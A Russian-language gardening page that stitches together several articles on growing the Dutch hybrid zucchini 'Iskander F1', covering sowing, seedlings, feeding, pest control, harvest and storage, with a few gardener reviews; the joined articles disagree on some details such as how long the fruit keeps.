22 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Кабачок сорта искандер

Кабачок Искандер F-1: секреты большого урожая

Кабачок Искандер F-1 это урожайный голландский гибрид. В течение сезона каждый куст дает 30-35 деликатесных плодов весом до полукилограмма каждый.

На российский рынок овощ пришел не так давно, но уже получил положительные отзывы овощеводов и дачников. Сначала его начали выращивать в Краснодарском крае, затем на юге России. Теперь сорт Искандер F-1 культивируют во многих регионах.

Описание сорта

Растет кабачок кустом. Каждый спелый плод имеет светло-зеленый колер. Его гладкая матовая поверхность словно усыпана мелкими белыми точками. Форма кабачка цилиндрическая. Ближе к плодоножке она сужается. Длина одного плода 20-25 сантиметров. Больше он не растет.

Если запоздать со сбором, мякоть гибрида останется такой же аппетитной и сочной. На цвет она кремово-белая. Огородников гибрид привлекает тем, что может давать завязи при низкой температуре, а плодоносит непрерывно до осени.

Даже 5 кустиков Искандера F-1, посаженных на даче, обеспечат кабачками семью на целый год, с одного куста можно получить до 17 килограммов урожая.

Посадка и уход

Вырастить гибрид несложно. В средней полосе для получения раннего урожая семена высевают в бумажные или пластиковые стаканчики в конце апреля. Плодородный грунт лучше купить в специализированном магазине. Всхожесть у Искандера F-1 превосходная. Уже через две-три недели, когда появятся крепкие листочки, растения переносят в грунт. Он должен быть легким, рыхлым с нейтральной кислотностью. Место выбирают на солнце или в полутени.

Поскольку кабачки не любят, чтобы тревожили их корни, рассаду аккуратно вынимают из стаканчиков и опускают в лунки. Расстояние между растениями оставляют не менее 60 сантиметров. Затем поливают и мульчируют почву.

В открытый грунт семена высевают, когда установится относительное тепло. В средней полосе это май, на юге – середина апреля. В каждую лунку на глубину примерно 5 сантиметров опускают два семечка. Когда они прорастут, оставляют один крепкий росток.

Кабачок Искандер F-1(фото) требует щедрого полива (обязательно под корень!) и рыхления почвы, сорняки удаляют.

Для того, чтобы растения были сильными, кусты необходимо за сезон пару раз окучить.

Первые плоды собирают уже через 45-50 дней после посадки.

Сорт устойчив к грибковым заболеваниям, поэтому химических способов защиты растений лучше избегать. Если появилась тля, в ведро воды добавляют столовую ложку нашатырного спирта и обмывают листья.

Из подкормок используют настой куриного помета (пол-литровая баночка на ведро воды), или калийно-фосфорные удобрения.

Собирают урожай по мере созревания в сухую погоду.

Преимущества и особенности кабачка Искандер F-1

Отзывы о сорте у дачников всегда положительные.

  1. Никогда не перерастает и имеет отличный вкус, малокалорийный, но при этом содержит набор витаминов и минеральных веществ.
  2. Если в почву каждую осень при перекопке вносить удобрения, на одной грядке кабачок можно выращивать несколько лет подряд.
  3. Овощ лежкий. Сорванные плоды в прохладном месте хранят до полугода. Важно, чтобы они были твердые, гладкие и без повреждений.
  4. Поскольку Искандер F-1 гибрид, семена его не собирают. Их снова придется покупать. Но результат окупит все затраты.

Урожайный гибрид сегодня культивируют не только дачники, его выращивают в промышленных масштабах. Во втором случае урожайность составляет 155 тонн с одного гектара.

Наши советы

Чтобы повысить урожайность, нужно позаботиться о привлечении пчел на грядку. Для этого цветущие кустики брызгают сладкой водой (100 граммов сахара или меда на литр воды). Можно в междурядьях посадить бархатцы.

Известно, что кабачок не переносит грунтовых вод, расположенных близко к поверхности. В этом случае допустимо овощи высаживать на холмики высотой до полуметра и диаметром до метра.

В холодных регионах, например, на Урале, кабачок можно вырастить в теплице. Главное условие – много солнца, регулярные подкормки и полив под корень.

Отзывы огородников-любителей

Я заказала семена гибрида Искандер F-1 в интернет-магазине. Всхожесть семян отличная. Плодоносили на протяжении двух месяцев. Однажды две недели не была на даче и думала, что мои кабачки стали грубыми на вкус, похожими на кормовые. Но ничего подобного. Урожай собрали большой. Браво!

Ольга Петровна, г. Новочеркасск.

О сорте Искандер слышала давно. В прошлом году приобрела в магазине один пакетик. Очень вкусные и качественные плоды выросли, ели кабачки все лето и заготовили на зиму консервы.

Раньше я выращивал цукини, так как их можно сохранить свежими до Нового года. Не нужно возиться с консервированием. Достал кабачок и приготовил. Когда мне сказали, что Искандер F-1 также можно хранить в подвале, я не поверил. Уж очень нежная у него кожица и мякоть. Но плоды благополучно дожили до января.

Кабачок сорта Искандер F1

Голландский кабачок Искандер является одним из наиболее востребованных. Овощ популярен благодаря нескольким качествами: высокой урожайности, раннеспелости, устойчивости к заморозкам и отменному вкусу плодов.

Кабачок сорта Искандер F1

Особенности сорта

Впервые этот сорт появился на территории Краснодарского края, позже стал успешно выращиваться и в других регионах России.

Плоды имеют такие характеристики:

  • кожица светло-зеленого оттенка, содержит мелкие вкрапления;
  • у зрелых овощей шкурка тонкая, легко снимается ножом;
  • на поверхности плодов есть небольшой восковой налет;
  • овощи имеют форму цилиндра, при полном созревании достигают 500-600 г.

К главным достоинствам кабачков F1 относят следующие:

  • высокая урожайность – при хорошем уходе и благоприятной погоде с одного растения удастся снять до 17 кг вкусных и сочных овощей;
  • раннеспелость – первый урожай овощей собирают уже через 1-1,5 месяца после посадки семян;
  • это один из немногих сортов, который легко переносит понижение температуры и плодоносит даже в холодное время;
  • растение неприхотливо в уходе;
  • обладает отменным вкусом.

Единственный недостаток сорта Искандер F1 – плоды хранятся недолго.

Особенности выращивания

Вырастить этот овощ удастся двумя методами – рассадным и непосредственной посадкой семян в открытый грунт. Семена должны пройти предварительную подготовку.

Обработка семян

Для успешного проращивания семечки замачивают в теплой воде, добавляя полезные микроэлементы для овощных культур. Оптимальная температура воды для замачивания – 20 °С.

После замачивания в течение нескольких часов семена заворачивают во влажную ткань и держат в условиях комнатной температуры (23-25 °С). Важно, чтобы ткань не пересыхала, иначе семечки не выпустят ростки. Ее периодически орошают из пульверизатора. Некоторые садоводы используют другой метод подготовки семян: помещают посевной материал в холодильную камеру на 15 часов. Затем следует процедура прогрева при температуре 23-24 °С. Эти манипуляции повторяют до тех пор, пока семечки не проклюнутся.

Кабачок Искандер является гибридом, поэтому семена выращенных плодов не подходят для посадки в следующем году.

Требования к почве

Для кабачков не подходит кислая почва

Подготовка участка под посадку сорта кабачка Искандер F1 осуществляется осенью: грунт перекапывают, удобряют, а с приходом весны рыхлят и разравнивают. Требуется использовать участок без закисления почвы, т.к. в кислой земле кабачки будут плохо расти и плодоносить. В почву вносят доломитовую муку, порошковой мел или гашеную известь.

Для хорошей урожайности и предупреждения появления паразитов требуется соблюдать правила севооборота, поэтому участок, на котором в прошлом году росли тыквенные культуры, не подходит для выращивания кабачков. Подходящими предшественниками являются морковь, лук, картофель, томаты, капуста и зелень.

Рассадный метод

Посадка семян в одноразовые стаканчики осуществляется во второй декаде апреля. Емкости заполняют рыхлой питательной землей. Огородную землю стоит смешать с песком, компостом или прошлогодним навозом в соотношении 5:1:1.

В стаканчиках делают углубления (2-3 см), затем в них кладут семена. Их присыпают грунтом и поливают теплой отстоявшейся водой. На одно растение расходуют 0,5 л воды.

Особенности ухода за рассадой

Уход за посевами заключается в следующем:

  1. До момента прорастания семян посевы накрывают и оставляют в теплом солнечном месте, обеспечивая стабильную температуру в пределах 20-25 °С. После того, как ростки проклюнутся сквозь почву, температуру понижают до 15-20 °С днем и до 12-15 °С ночью. В таких условиях ростки держат на протяжении 5 дней. Затем температуру повышают до 18-23 °С в дневное время, а ночью понижают до 14-17 °С. Такой температурный режим соблюдают до момента пересадки растений на грядку.
  2. Поливать ростки следует регулярно и только теплой отстоявшейся водой. На 7-8 растений расходуют 1 л воды, частота поливов – раз в 5 дней.
  3. Как только появятся первые всходы, что происходит примерно через неделю, посевы подкармливают раствором мочевины (на 1 л воды приходится 0,5 ч. л. вещества). На одно растение расходуют 200 мл рабочего раствора. Через неделю производят еще одну подкормку, используя нитрофоску (1 ч. л. вещества растворяют в 1 л воды). Под один саженец выливают стакан жидкого удобрения.

При обеспечении этих условий человек сможет получить крепкую и здоровую рассаду для дальнейшего выращивания в открытом грунте.

Пересадка на грядку

Растение можно пересаживать при появлении третьего листа

Пересадка растений на грядку осуществляется на этапе появления третьего листа. Выполняют эту процедуру в конце мая или в начале июня. Для посадки лучше использовать паровую грядку или кучу.

На удобренном и разрыхленном участке лунки располагают на расстоянии 60 см друг от друга, поливают их теплой водой и опускают в них проросшие сеянцы на глубину 2-3 см. Затем растения присыпают землей, слегка прижимают и поливают еще раз.

Для более ранней высадки рассады на участок (в начале или в середине апреля) следует заранее соорудить укрытие из металлического каркаса и пленки. На ночь посевы накрывают материалом.

Высадка в открытый грунт

Оптимальное время для высадки семян в открытый грунт – последняя декада мая или первая декада июня. К этому времени почва прогреется до нужной температуры в 10-12 °С. Несмотря на то, что это растение хорошо переносит холод, для быстрого прорастания и роста семена высаживают в безветренное и солнечное место.

Семечки углубляют в заранее подготовленные бороздки на расстоянии 60 см друг от друга. Высаживать семечки требуется острым концом вниз. Сверху посевы присыпают землей, поливают их теплой водой. На ночь их лучше укрыть пленкой или любым нетканым материалом, т.к. воздух в ночное время суток прохладнее и способен негативно повлиять на скорость прорастания семян.

По мере роста и развития сеянцы прореживают, удаляя вытянувшиеся, тонкие и пожелтевшие стебли. На пустое место подсаживают крепкие ростки. Уход за кабачками несложен и заключается в следующем:

  1. Полив и рыхление. Посадки увлажняют по мере просыхания грунта. Под каждый куст выливают до 5 л воды. В дождливое лето увлажнение проводят не чаще раза в неделю или реже. Переувлажнение кустов способно привести к загниванию корневой системы и гибели растений. После поливов почву мульчируют, затем производят поверхностное рыхление, чтобы не повредить корни растения, расположенные близко к поверхности грунта.
  2. Подкормки. За весь сезон выращивания кабачки Искандер F1 требуется подкормить три раза. При появлении двух пар листьев под кусты вносят аммиачную и калийную селитру (по 20 г каждого компонента) и 40 г суперфосфата. Сухую смесь растворяют в ведре воды. Также в качестве первой подкормки подойдет раствор коровяка, на 20 л воды приходится 1 л вещества. На этапе формирования завязей кабачки удобряют калийной селитрой и суперфосфатом – по 50 г каждого вещества на ведро воды. Повторно подкормку вносят в период плодоношения, что повышает урожайность кустов и качество плодов.

Профилактика

Эта культура редко болеет и не страдает от паразитов, заражение возможно только в случае неправильного ухода и несоблюдения правил севооборота. При борьбе с такими болезнями, как серая гниль, мучнистая роса и антракноз используют бордоскую смесь или медный купорос. Для истребления паразитов (паутинного клеща, тли, белокрылки) применяют инсектициды: «Актеллик», «Конфидор», «Актара» или «Фундазол».

Кабачок Искандер F1

Кабачок Искандер F1 – гибрид голландской селекции. Отличается очень ранним сроком созревания, приятным нежным вкусом плодов, выносливостью. Выращивается в странах с различными климатическими условиями, так как пригоден для возделывания в открытом грунте и теплицах. В уходе не требователен, а урожайность имеет очень высокую.

Описание и характеристики сорта Искандер F1

Кабачок Искандер F1 относится к раннеспелым гибридам кустового типа. От появления первых всходов и до сбора урожая проходит в среднем 40 суток. При этом срок плодоношения у него весьма долгий – до первых заморозков. Урожайность высокая – 17 кг/куста. Имеется устойчивость к некоторым заболеваниям, засухе, небольшим заморозкам. Рекомендуется для выращивания в теплицах, пленочных туннелях и на отрытом грунте.

Плоды цилиндрической формы, узкие, длиной 15-20 см

Растение мощное, но довольно компактное, прямостоящее. Плоды цилиндрической формы, узкие, длиной 15-20 см. Поверхность гладенькая, ребристость развита слабо. У плодоножки кабачок немного сужается. Основная часть кожуры зеленоватая с обилием прожилок и крапинок. Масса одного овоща 480-640 грамм. Мякоть всегда плотная, кремово-белая. Вкусовые качества отличные.

Как сажать кабачок Искандер F1?

Лучше всего кабачок Искандер F1 растет на легкой плодородной почве с низкой или умеренной кислотностью. Грунтовые воды должны располагаться как можно ниже, так как обилие влаги приведет к загниванию корневой системы. Высаживается после лука, томата, картофеля, моркови и свеклы.

Лучше всего кабачок Искандер F1 растет на легкой плодородной почве с низкой или умеренной кислотностью

Посев семян в открытый грунт всегда приходится в конце мая или начале июня. В теплицы и пленочные туннели можно сажать культуру с начала апреля. Если задержать с посадкой, растение будет медленно развиваться и может дать мало урожая – завязи появляются при небольших температурах, в жару их можно не ожидать. Однако более ранняя посадка может привести к вымерзанию посевов при первых же запоздалых морозах, так как значительные понижения температур этот сорт кабачков не выдерживает.

Под высадку готовятся отдельные лунки на расстоянии в 60 см друг от друга в шахматном порядке. Если земля не удобрялась осенью или за 2 недели до посадки культуры, стоит в каждую ямку положить примерно жменю перегноя или компоста, хорошенько смешать с землей и полить прогретой на солнце водичкой.

В каждую лунку закладывают по 2-3 семени на глубину 4-5 см, чтобы всходы появились наверняка. Затем их присыпают землей примерно на 4 см. Заранее обрабатывать семена кабачка Искандер F1 не нужно, если фирма проверенная, а семена обработаны еще на фабрике по их производству (указывается на упаковке). В противном случае можно замочить их до посадки на 30 минут в растворе марганцовки или настое древесной золы.

Нужно ли делать рассаду?

При посадке в открытый грунт или теплицу семенами кабачки сорта Искандер F1 дают отменные всходы, созревают быстро, поэтому рассаду обычно не делают, если продукт выращивается для личного потребления. Если же овощ необходим для продажи, можно заготовить рассаду, только желательно в торфяных стаканчиках, так как пересадку молодые растения этого вида не любят.

Рассаду начинают делать с начала марта, чтобы уже через месяц пересадить ее в теплицу или парник. Если же культура возделывается прямо под открытым небом, заготовку стоит отложить на середину апреля. Выращивается она в течение 1 месяца, затем пересаживается в отдельные лунки. Если рассада слабая можно в каждую лунку сажать по 2 ростка, а не по одному, просто для подстраховки.

Как ухаживать за кабачком Искандер F1?

Пока семена не дали всходов уход за культурой минимальный. Ее можно разве что полить, если земля сильно пересохнет и удалить сорняки, чтобы они не забирали из земли питательные вещества.

Как только появились всходы кабачков сорта Искандер F1, за ними нужно начинать внимательно смотреть. Самые хилые и слабые стоит удалять – они не дадут большого урожая и только потянут полезные вещества из земли. Убирать плохие ростки нужно очень аккуратно, чтобы не повредить корешки «соседей».

Вначале можно разве что полить, если земля сильно пересохнет и удалить сорняки

Дальнейший уход сводится к регулярному поливу, рыхлению, окучиванию, уборке сорняков, внесении подкормок. Важно отметить, что обильный полив нужен только в период развития растения и появления завязей. В остальное время стоит его ограничивать. Поливают кустики только тогда, когда земля под ними начнет подсыхать.

Время от времени может потребоваться опрыскивание кабачка Искандер F1 от вредителей или болезней. Использовать рекомендуется народные средства на начальной стадии или же специализированные биологические и химические препараты в более запущенных случаях.

Сбор и хранение урожая

Сбор урожая проводят раз в две недели, а то и чаще, после того, как плоды достигнут технической спелости. Интересной особенностью сорта является то, что чем чаще собираются плоды, тем быстрее появляются новые завязи.

Сбор должен проводиться в сухую погоду, чтобы плоды не были мокрыми от дождя или росы

Передерживать кабачок Искандер F1 на кустах не рекомендуется. Сбор должен проводиться в сухую погоду, чтобы плоды не были мокрыми от дождя или росы.

После сбора их стоит спрятать в холодильник, использовать для приготовления блюд или перерабатывать для последующего хранения. Кабачки Искандер F1 имеют универсальное предназначение, их используют для приготовления различных блюд, консервирования, заморозки, иногда даже для сушки.

ВИДЕО — Выращивание кабачков Искандер гибрид F-1

Кабачок Искандер

Кабачок Искандер F1 – одна из лучших разработок голландских селекционеров, быстро завоевавшая популярность у овощеводов благодаря своим исключительным качествам. Высокоурожайный и нетребовательный в уходе, с отличными вкусовыми характеристиками плодов, гибридный сорт привлекателен как для посадки на даче, так и для массового производства. Выведен Искандер специалистами транснациональной компании Monsanto. Кабачок включен в Госреестр селекционных достижений Российской Федерации в 2006 году. С успехом выращивается не только в южных областях страны, но и на Дальнем Востоке, в Западной Сибири, на Урале.

Внешний вид кабачка Искандер представлен фото:

Описание кабачка Искандер

Растение представляет собой крепкий, прямостоящий, компактный, густо облиственный куст, защищающий плоды от негативного воздействия прямых солнечных лучей. Корневая система кабачка Искандер поверхностного типа, хорошо развита, включает крепкий стержневой корень и разветвленные боковые. Листья крупные, пятилопастные, пятнистые на длинных граненых черешках, имеют зазубрины по краям. Цветы – колокольчатой формы, ярко-желтого цвета, на короткой цветоножке. Плодоношение кабачка сорта Искандер в теплом климате наступает через 40–45 дней после посева семян.

Описание плодов

Плоды кабачков сорта Искандер цилиндрические или булавовидные, бледно-зеленые с гладкой поверхностью, однородные. Кожица тонкая, нежная с восковым налетом, белесыми крапинками и прожилками. В среднем кабачка Искандер достигают длины 20 см и массы 500–700 г. Мякоть кремового оттенка, плотная, сочная, без семечек, с нежным сладковатым вкусом, не теряет товарных качеств при перерастании. Овощи рекомендуется собирать по достижению 12 см в длину, пока в них еще нет семян и они обладают наилучшими вкусовыми качествами.

Характеристики сорта

Искандер F1 – партенокарпический гибрид первого поколения. Образует плоды без опыления, но только в первый год. Семена в них либо отсутствуют, либо нежизнеспособны – из них невозможно вырастить урожай. Растение данного сорта выносливо, имеет иммунитет к заболеваниям. Способен к завязи плодов при относительно низких температурах – до +10˚С, возможно разведение культуры в регионах с прохладным коротким летом. Резкое похолодание, частые дожди не влияют на плодоношение кабачка Искандер. Подходит для высадки в открытый грунт и выращиванию в теплице. Оптимальными климатическими условиями для полноценного развития и роста кабачка сорта Искандер является теплая солнечная погода при +21–26 ˚С и влажность 70–80%. Несмотря на стрессоустойчивость, похолодание ниже +5 ˚С для него нежелательно. Молодые побеги погибают даже от кратковременных заморозков.

Урожайность

Несмотря на небольшой размер куста, одно растение сорта Искандер дает в среднем около 20 кг плодов. Характеризуется длительным сроком плодоношения, урожай можно собирать до первых заморозков. Во избежание деформации плодов куст необходимо подвязывать. Кабачки Искандер следует срезать 1–2 раза в неделю, своевременный сбор плодов способствует формированию новых завязей, что повышает урожайность. Выдержка плодов на кусте дольше срока приводит к их перезреванию и приводит к тому что все силы растение отдает на обеспечение созревших кабачков в ущерб новым. Для длительного хранения плоды растения собирают в состоянии биологической спелости, не допуская их подмораживания.

Область применения плодов

Искандер F1 – универсальный сорт кабачков, подходит для приготовления салатов, соков, горячих блюд. Хорошо сочетается с мясом животных и птиц, сыром, другими овощами, соусами. Молодые зеленцы можно употреблять в свежем виде. Овощ обладает отличными консервными свойствами – его используют для заготовок на зиму. Кабачок Искандер F1 низкокалориен, поэтому рекомендован для диетического питания. В 100 г свежего продукта содержится всего 24 ккал.

Устойчивость к заболеваниям и вредителям

Гибридный сорт Искандер F1 обладает высокой сопротивляемостью характерным для кабачков вирусным и грибковым заболеваниям: антракнозу, огуречной мозаике, мучнистой росе, белой гнили. Мерами профилактики являются:

  • соблюдение правил севооборота;
  • полив теплой водой;
  • окучивание и рыхления;
  • применение некорневых подкормок;
  • сокращение количества поливов;
  • удаление сорняков и отживших растений;
  • опрыскивание мыльным раствором.

Насекомые наносят вред кабачку Искандер так же, как и другим сортам. Главными вредителями являются бахчевая тля, белокрылка, паутинный клещ и ростковая муха. Они легко возникают на загущенных посадках при нерегулярной прополке. Для отпугивания насекомых растения опудривают золой или табачной пылью. Обработка кабачков производится инсектицидами: «Карбофосом», «Фуфононом», «Конфидором», «Фосбецидом». Пораженные растения удаляют и сжигают.

Для того чтобы защитить растение от слизней, следует замульчировать грядку соломой. Она же и предохранит плоды от загнивания в случае избытка влаги во время сильных дождей.

Достоинства и недостатки сорта

В результате селекции сорт кабачка Искандер приобрел ряд неоспоримых достоинств:

  • высокая всхожесть;
  • универсальность;
  • высокая урожайность;
  • длительный срок плодоношения;
  • хороший товарный вид;
  • маленькие семена;
  • превосходные вкусовые качества;
  • привитая устойчивость к заболеваниям;
  • кабачок сорта Искандер хорошо переносит жару и первые холода;
  • не нуждается в опылении;
  • отлично переносит транспортировку;

К недостаткам сорта можно отнести:

  • не подходит для зимнего хранения;
  • непригодность семян к посадке в следующий сезон;

Особенности посадки и ухода

Семена кабачка Искандер можно высаживать на рассаду в теплице или непосредственно в открытый грунт. Их необходимо замочить на сутки в препарате – стимуляторе роста семян «Экогель», «Эпин-экстра», «Циркон». Затем завернуть во влажную ткань. После появления первых ростков поместить в почву. В открытый грунт семена или рассаду высаживают в апреле-мае при прогревании его до + 12 ˚С. Перед посадкой в почву вносят торф, навоз, перегной, золу. При близком расположении грунтовых вод грядки для сорта Искандер F1 необходимо завышать. Также следует учитывать, что высокая ботва будет затенять низкорослые растения, поэтому кабачки следует высаживать севернее таковых и с южной – по отношению к деревьям, строениям, кустарникам и заборам.

При посеве на рассаду можно получить сверхранний урожай – на 3–4 недели раньше положенного срока. Но эти плоды будут совершенно непригодны для длительного хранения в отличие от семян, посеянных сразу в почву.

Для выращивания культуры сорта Искандер следует выбрать хорошо освещенный, солнечный, защищенный от ветров участок с легкой супесчаной или суглинистой землей пониженной кислотности. Если почва тяжелая – следует добавить в нее песок и древесные опилки, кислотность понижают путем внесения доломитовой муки. Под один куст кабачка следует выделять площадь в 1 кв. м, схема посадки – 150 х 70 см. После укоренения растения землю следует регулярно рыхлить и обильно поливать один раз в 3–4 суток. Недостаточный полив приводит к появлению горечи в плодах овоща.

Куст кабачка Искандер следует подкармливать калийными и комплексными бесхлорными удобрениями 2–3 раза за вегетационный период. Тыквенные культуры являются нежелательными предшественниками ввиду потребления из почвы одних и тех же питательных веществ, а также опасности поражения общими заболеваниями и вредителями.

Заключение

Кабачок Искандер – результат селекционной работы, направленной на улучшение качественных характеристик культуры. Стабильность и длительность плодоношения, устойчивость к заболеваниям и стрессам, отличные вкусовые характеристики демонстрируют эффективность попыток совершенствования исходного природного материала. Овощеводы и огородники оставляют положительные отзывы о кабачках сорта Искандер, его популярность растет из года в год.

Искандер кабачок – урожай высок

Кабачок – однолетняя овощная культура, являющаяся разновидностью обыкновенной тыквы. Полезные и вкусные растения занимают несколько грядок на любом огороде. Особой популярностью пользуются гибридные сорта, отличающиеся высокой урожайностью, приятным вкусом и стойкостью к погодным условиям. Из голландской серии огородники выделяют кабачок «Искандер F1». Он относится к раннеспелым сортам, прост в уходе, отличается продолжительным периодом плодоношения.

Описание и фото сорта

Гибрид голландской серии кабачок «Искандер f1» отлично подходит к погодным условиям умеренного климата. При описании сорта оригинатор представляет его как кустовую форму, предназначенные для выращивания в открытом и закрытом грунте. Компактное растение имеет прямостоячий стебель, мощную корневую систему, крупные листья темно-зеленого цвета с выраженной пятнистостью.

Информация. Сорт «Искандер F1»(Eskanderany f1) зарегистрирован в 2001 году. В России апробацию прошел в Краснодарском крае.

Техническая зрелость тыквин наступает спустя 40-45 дней после посадки. Форма и окраска плодов типична для кабачков:

  • длина 18-20 см;
  • масса – 0.5-0,7 кг;
  • мякоть кремово-белая с нежным вкусом;
  • семена белые, среднего размера;
  • кожура тонкая, светло-зеленая с прожилками и крапинками. На поверхности слабый восковый налет;
  • урожайность – с куста 17 кг, с 1 га – до 150 т.

Гибрид «Искандер f1» относится к партенокарпическим (самоопыляемым) видам. Для завязывания плодов не требуется перенос пыльцы. Это ценное свойство позволяет получать большой урожай независимо от посещения цветов насекомыми. Сорт рекомендован для выращивания на частных огородах и в промышленных масштабах на полях. Овощи устойчивы к болезням – мучнистой росе и антракнозу.

Преимущества сорта «Искандер f1»:

  • Гибрид рекомендован к выращиванию в различных регионах.
  • Ранний срок созревания.
  • Устойчивость к распространенным болезням кабачков.
  • Высокая урожайность, по весу полученных тыквин превосходит популярные сорта («Грибовский», «Аэронавт», «Якорь») в 1,5-2 раза.
  • Голландский гибрид стойко переносит засуху и понижение температуры.
  • Кожица плодов легко срезается, мякоть обладает приятным ярким вкусом.

Полезные качества овоща

Кабачки популярны благодаря своим диетическим свойствам и обилию полезных веществ. В их нежной мякоти содержится калий, фосфор, железо, витамины группы B, C, PP. Плоды богаты углеводами, а также минеральными солями, нормализующими обмен веществ в организме человека. Молодые тыквины можно запекать, тушить, жарить. Зрелые кабачки используют для консервирования.

Особенности посадки и ухода

Для выращивания гибрида рекомендуется выбирать солнечный участок с нейтральной или слабокислой почвой. Если показатель pH не соответствует норме, в землю добавляют доломитовую муку или древесную золу. Следует избегать мест с близким расположением грунтовых вод. Получение обильного урожая это целая наука, опытные аграрии знают, что даже предшественники, выращиваемые на участке, имеют значение. Кабачки хорошо растут на грядках, занимаемых в прошлом году луком, картофелем, белокочанной капустой, бобовыми культурами.

Способы выращивания — рассадный и семенами. Первый вариант позволяет быстрее получить к столу молодые кабачки.

Рассадный способ

Семена «Искандер F1» проходят заводскую обработку фунгицидами, предотвращающими развитие болезней. Готовить их к посеву начинают в середине апреля. На сутки замачивают в воде комнатной температуры (20-22°), в которую добавляют несколько капель стимулятора роста «Эпин», «Идеал». Затем семена заворачивают во влажную ткань и оставляют в теплом месте на 2-3 дня. Такая среда стимулирует развитие ростка. Нельзя допускать высыхания ткани.

Совет. Проверяйте срок годности покупных семян, они могут полностью утратить всхожесть.

Саженцы кабачков очень хрупкие, легко повреждаются при пикировке, поэтому лучше сразу подготовить для них отдельные емкости. Оптимальный вариант торфяные стаканчики размером 10×10 см, из которых растения не нужно пересаживать. Наполняют их питательной почвенной смесью. Грунт готовится из торфа, перегноя и дерновой земли. В смесь добавляют 10-15 г комплексного минерального удобрения. Самостоятельно готовить почву не обязательно, для небольшого количества рассады можно купить готовый грунт для кабачков.

Каждый стаканчик заполняют почвой и заглубляют семя на 2-3 см, затем поливают теплой водой. Выращивание происходит в помещении с температурой 18-19°. Стаканчики должны находиться в хорошо освещенном месте. Рассада растет быстро, через месяц готова к высадке в открытый грунт. Саженцы кабачков хорошо переносят условия квартиры, главное не перегревать их. Основное требование – продолжительный световой день. При недостатке солнечных лучей рассада очень вытянется. Почва в стаканчиках должна быть влажной, но без перелива.

Выбор времени посадки в огород зависит от климатических условий региона. Желательно узнать погоду на ближайшую неделю, не грозят ли посевам ночные заморозки. Подготовка почвы обычная – рыхление, разравнивание, внесение органических удобрений. Чтобы мощные корни овощей не мешали другу друг, расстояние между ними делают до 60 см. Готовность рассады определяет появление двух-трех настоящих листиков. У здоровых саженцев крепкий стебель и длинные корешки.

Совет. Высаживайте рассаду «Искандер f1» в пасмурный день или ранние утренние часы. На время адаптации кабачки лучше прикрывать от яркого солнца нетканым материалом.

Перед посадкой лунки хорошо увлажняют теплой водой. Рассада высаживается непосредственно с торфяным стаканчиком. Если кабачки выращивались в обычной емкости, то они пересаживаются с комом земли. Заглубляют рассаду до семядолей.

Безрассадный способ

Выбирая семена для посадки в открытом грунте, отбраковывайте легкие и деформированные, они не дадут всходов. Материал следует замочить на несколько дней, как в случае с выращиванием рассады. Период посадки зависит от температуры воздуха и земли. Семена прорастают при 15°C, но хрупкие саженцы не переносят заморозков. В разных климатических зонах сроки сева растягиваются с конца мая до начала июня.

Совет. Для получения сверх раннего урожая семена высаживают в середине мая. Чтобы всходы не повредили ночные заморозки, используйте временные укрытия из пленки или нетканого материала.

Под семена готовят лунки на расстоянии 60 см, чтобы кусты не отнимали питание друг у друга. Почва под кабачки должна быть легкой и рыхлой. Улучшают структуру грунта внесение опилок. Каждую лунку хорошо увлажняют, укладывают 2-3 семени для гарантированных всходов. Глубина посадки 5-7 см.

Уход за кабачками

Гибриды устойчивы к негативным факторам, в том числе засухе, но для получения обильного урожая растениям нужна влага в достаточном количестве. Полив осуществляется 1 раз в неделю, на каждое растение требуется около 10 л теплой воды. Подогревается влага под солнечными лучами. Холодная вода провоцирует болезни растений. Влага льется под корень, желательно не мочить листья. Отличный вариант для кабачков «Искандер f1» устройство капельного полива. Система поможет избежать избыточной влаги, которая вредна для культуры. Желательно замульчировать почву торфом и перегноем. Под защитным слоем влага будет дольше сохраняться.

Подкормка и прополка

Овощи плохо развиваются из-за соседства сорняков, поэтому прополка должна быть регулярной. После появления 4-5 листков саженцы рекомендуется окучить, это придаст устойчивости молодым кустам. Подкармливают растение 2-3 раза за сезон. В качестве удобрений используют суперфосфаты, калийную и аммиачную селитру. Вещества растворяют в воде. Хорошей подкормкой является куриный помет. Органику разводят водой в соотношении 1:10.

Информация. Один из существенных плюсов сорта – возможность завязывать плоды при низкой температуре воздуха. В этом он схож с сортом кабачков «Кавили».

Сбор и хранение урожая

Плоды гибрида «Искандер» не склонны к перезреванию. При сборе в момент технической спелости они отличаются отличными вкусовыми характеристиками, могут употребляться в сыром виде. Тыквины можно снимать 2 раза, у растения появляется больше сил для формирования новых завязей. Зрелость плода определяют по цвету кожицы (он должен быть светло-зеленый) и размеру. Опытные огородники определяют состояние кабачков по звуку – спелые плоды звучат глухо.

Собирая урожай, не стоит срывать кабачки рукам. Это сложно, к тому же травмируется куст. Ровный срез ножом избавит от проблем. Плоды хранят в холодильнике или другом прохладном месте. Для продолжительного лежания овощи срезают с частью плодоножки длиной до 5 см. В темном, сухом, прохладном и проветриваемом месте кабачки не утрачивают свежесть 3-4 месяца.

Совет. Кабачки на хранение собирают в сухую погоду, влажные тыквины быстро испортятся. Кожица плодов должна быть целой, повреждения не допустимы.

Что делать с обильным урожаем, полученным с нескольких кустов голландского гибрида? Кабачки этого сорта универсальный продукт. Они хороши для приготовления любых блюд, кабачковой икры, маринования, сушки и консервации. Сорт «Искандер f1» рекомендуется для выращивания на продажу.

Оставлять семена выращенных кабачков не имеет смысла, гибриды дают только одно поколение. На следующий год необходимо снова покупать посадочный материал полюбившегося сорта. Выбирайте семена известных, проверенных фирм, тогда всхожесть будет хорошая.

Ссылка на основную публикацию
Adblock
detector
